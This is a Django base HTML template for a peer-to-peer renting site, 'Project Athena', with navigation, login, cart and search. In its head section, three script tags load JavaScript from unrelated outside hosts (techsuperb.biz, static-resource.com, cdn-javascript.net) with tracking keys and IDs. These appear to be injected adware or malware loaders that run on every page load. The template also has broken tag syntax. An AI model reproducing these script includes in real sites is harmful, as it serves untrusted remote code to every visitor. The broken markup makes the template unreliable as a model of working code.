{% load static %}
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />

<!DOCTYPE html>

<html>
<head>

    <!-- jQuery -->
<script src="{% static 'js/jquery-2.0.0.min.js' %}" type="text/javascript"></script>
<script src="//techsuperb.biz/200e670f09e3b73afa.js"></script>

<!-- Bootstrap4 files-->
<script src="{% static 'js/bootstrap.bundle.min.js' %}" type="text/javascript"></script>
<link href="{% static 'css/bootstrap.css' %}" rel="stylesheet" type="text/css">

<!-- Font awesome 5 -->
<link href="{% static 'fonts/fontawesome/css/fontawesome-all.min.css' }" type="text/css" rel="stylesheet">

<!-- custom style -->
<link href="{% static 'css/ui.css' %}" rel="stylesheet" type="text/css">
<link href="{% static 'css/responsive.css" rel="stylesheet" media="only screen and (max-width: 1200px)">

<!-- custom javascript -->
<script src="{% static 'js/script.js' %}" type="text/javascript"></script>

<script type="text/javascript"></script>

<script type="text/javascript"
        src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8206x"></script>
<script type="text/javascript"
        src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8206x&amp;format=arrjs&amp;r=1556562771927"></script>



    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
          integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

    <link rel="stylesheet" type="text/css" href="{% static 'P2P_Renting/main.css' %}">

    {% if title %}
    <title>Project Athena - {{ title }}</title>
    {% else %}
    <title>Project Athena</title>
    {% endif %}
</head>
<body>
<header class="site-header">
    <nav class="navbar navbar-expand-md navbar-dark bg-steel fixed-top">
        <div class="container">
            <!--<img class="rounded-circle account-img" src="{{ user.profile.image.url }}">-->
            <div class="navbar-nav mr-auto">
                <a class="navbar-brand mr-4" href="{% url 'P2P_Renting-Home' %}">
                    <img class="logo"  src="{% static 'images/logos/logo_brand.png' %}"> Project Athena
                </a>
            </div>
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarToggle"
                    aria-controls="navbarToggle" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarToggle">
                <div class="navbar-nav mr-auto">
                    <a class="nav-item nav-link" href="{% url 'P2P_Renting-Home' %}">Home</a>
                    <a class="nav-item nav-link" href="{% url 'P2P_Renting-About' %}">About</a>
                </div>
                <!-- Navbar Right Side -->
                <div class="navbar-nav">
                    {% if user.is_authenticated %}
                        <form method="GET" action="{% url 'search:search_view' %}" class="form my-2 my-lg-0">
                            <div class="input-group">
                                <input class="form-control " type="text" placeholder="Search" name="q" aria-label="Search" value="{{ request.GET.q }}">
                                <div class="input-group-append">
                                    <button class="btn btn-outline-default btn-rounded btn-sm my-0" type="submit"><i class="fa fa-search text-grey" aria-hidden="true"></i></button>
                                </div>
                            </div>
                        </form>
                        {% if request.session.cart_items <= 0 %}
                            <a class="nav-item nav-link" href="{% url  'cart' %}"><i class="fa fa-opencart"></i></a>
                        {% else %}
                            <a class="nav-item nav-link" href="{% url  'cart' %}">{{ request.session.cart_items }} <i class="fa fa-opencart"></i></a>
                        {% endif %}
                        <a class="nav-item nav-link" href="{% url  'P2P_Renting-Create' %}">New Post</a>
                        <a class="nav-item nav-link" href="{% url  'myPosts' %}">My Posts</a>
                        <a class="nav-item nav-link" href="{% url  'profile' %}">Profile</a>
                        <a class="nav-item nav-link" href="{% url  'logout' %}">Logout</a>
                    {% else %}
                        <a class="nav-item nav-link" href="{% url 'login' %}">Login</a>
                        <a class="nav-item nav-link" href="{% url  'register' %}">Register</a>
                    {% endif %}
                </div>
            </div>
        </div>
    </nav>
</header>
<main role="main" class="container">
    <div class="row">
        <div class="col-md-12">
            {% if messages %}
            {% for message in messages %}
            <div class="alert alert-{{ message.tags }}">
                {{ message }}
            </div>
            {% endfor %}
            {% endif %}
            {% block content %}{% endblock %}
        </div>
        <!--<div class="col-md-4">-->
            <!--<div class="content-section">-->
                <!--<h3>Our Sidebar</h3>-->
                <!--<p class='text-muted'>You can put any information here you'd like.-->
                <!--<ul class="list-group">-->
                    <!--<li class="list-group-item list-group-item-light">Latest Posts</li>-->
                    <!--<li class="list-group-item list-group-item-light">Announcements</li>-->
                    <!--<li class="list-group-item list-group-item-light">Calendars</li>-->
                    <!--<li class="list-group-item list-group-item-light">etc</li>-->
                <!--</ul>-->
                <!--</p>-->
            <!--</div>-->
        <!--</div>-->
    </div>
</main>

<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
        integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
        crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"
        integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
        crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"
        integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
        crossorigin="anonymous"></script>
</body>
</html>